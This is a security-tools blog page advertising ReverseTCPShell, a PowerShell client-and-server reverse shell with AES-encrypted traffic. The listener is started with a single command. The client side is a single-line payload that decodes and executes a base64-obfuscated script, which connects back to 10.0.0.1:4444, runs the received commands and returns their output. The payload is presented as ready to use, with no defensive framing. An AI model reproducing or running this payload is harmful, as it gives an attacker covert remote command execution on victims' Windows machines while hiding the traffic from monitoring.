ReverseTCPShell : PowerShell ReverseTCP Shell, Client & Server

ReverseTCPShell is a tool for Reverse Encrypted (AES 256-bit) Shell over TCP using PowerShell SecureString.

  • Attacker (C2-Server Listener):

PS> .\ReverseTCP.ps1

  • Target (Client):

CMD> ECHO IEX([string]([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String({JABCAGEAcwBlADYANAA9ACIAOABHAEkAWABKADMAKwBBAE0AYgAzADIASgBXAEIAZgAyADkAdQBkAGoAcgBqAHYAeQBkAHUALwB4AFgARgBFAHUAYgB0AHQAVABhAHYAWAAwAGEAbwA9ACIAOwAkAEsAZQB5AD0AKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgBhAHMAZQA2ADQAKQApADsAJABDAGwAaQBlAG4AdAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwAxADAALgAwAC4AMAAuADEAJwAsADQANAA0ADQAKQA7ACQAUwB0AHIAZQBhAG0APQAkAEMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAQgB5AHQAZQBzAD0AMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABSAGUAYQBkAD0AJABTAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAEIAeQB0AGUAcwAsACAAMAAsACAAJABCAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABDAG8AbQBtAGEAbgBkAD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAQgB5AHQAZQBzACwAMAAsACAAJABSAGUAYQBkACkAOwAkAEQAZQBDAG8AZABlAD0AJABDAG8AbQBtAGEAbgBkACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAtAEsAZQB5ACAAJABLAGUAeQA7ACQATwB1AHQAUAB1AHQAPQAoAEkARQBYACgAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUAB0AHIAVABvAFMAdAByAGkAbgBnAEEAdQB0AG8AKABbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBTAGUAYwB1AHIAZQBTAHQAcgBpAG4AZwBUAG8AQgBTAFQAUgAoACQARABlAEMAbwBkAGUAKQApACkAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA7ACQARQBuAEMAbwBkAGUAPQBDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAAJABPAHUAdABQAHUAdAAgAC0AQQBzAFAAbABhAGkAbgBUAGUAeAB0ACAALQBGAG8AcgBjAGUAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAtAEsAZQB5ACAAJABLAGUAeQA7ACQAUwBlAG4AZABCAHkAdABlAD0AKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAEUAbgBDAG8AZABlACkAOwAkAFMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABTAGUAbgBkAEIAeQB0AGUALAAwACwAJABTAGUAbgBkAEIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABTAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAQwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApADsARQB4AGkAdAA=}))));Exit | PowerShell –

Also Read – Metabigor : Command Line Search Engines Without Any API Key

PoC:

  • Payload Execution:
  • Analyze Encrypted Traffic:
Download
R K

Share
Published by
R K
Tags: ClientPowerShellReverseTCPReverseTCPShellServerShell
6 years ago

Recent Posts

cp Command: Copy Files and Directories in Linux

The cp command, short for "copy," is the main Linux utility for duplicating files and directories. Whether…

1 week ago

Image OSINT

Introduction In digital investigations, images often hold more information than meets the eye. With the…

1 week ago

cat Command: Read and Combine File Contents in Linux

The cat command short for concatenate, It is a fast and versatile tool for viewing and merging…

1 week ago

Port In Networking

What is a Port? A port in networking acts like a gateway that directs data…

1 week ago

ls Command: List Directory Contents in Linux

The ls command is fundamental for anyone working with Linux. It’s used to display the files and…

1 week ago

pwd Command: Find Your Location in Linux

The pwd (Print Working Directory) command is essential for navigating the Linux filesystem. It instantly shows your…

1 week ago